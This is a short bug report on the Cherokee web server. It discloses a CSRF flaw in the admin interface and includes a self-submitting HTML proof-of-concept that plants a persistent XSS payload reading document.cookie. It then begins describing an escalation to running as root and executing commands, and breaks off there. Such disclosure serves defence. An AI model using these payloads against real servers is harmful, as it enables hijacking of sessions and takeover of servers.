Comment 0 for bug 784632

Binary package hint: cherokee

The cherokee admin server is vulnerable to csrf.

Using csrf it is possible to produce a persistent xss in several pages in at least the 'status' page.
An example of this is the following:

<html>
<body>
 <form action="http://127.0.0.1:9090/vserver/apply" method="post" id="xssform">
 <input type="text" name="tmp!new_droot" value='/var/www/'></input>
 <input type="text" name="tmp!new_nick" value='" onselect=alert(1) autofocus> <embed src="javascript:alert(document.cookie)">'></input>
</form>
<script>document.getElementById("xssform").submit();</script>
</body>

A Worst case scenario could be something like the following:
If a user is logged in and the cherokee admin server is running on localhost:9090 then if they visit a $bad page which sends post requests to the cherokee admin server - the bad page may be able to send requests to the server so as to reconfigure it to:

1. run as root
2. the logging of error(or access) will run a command ...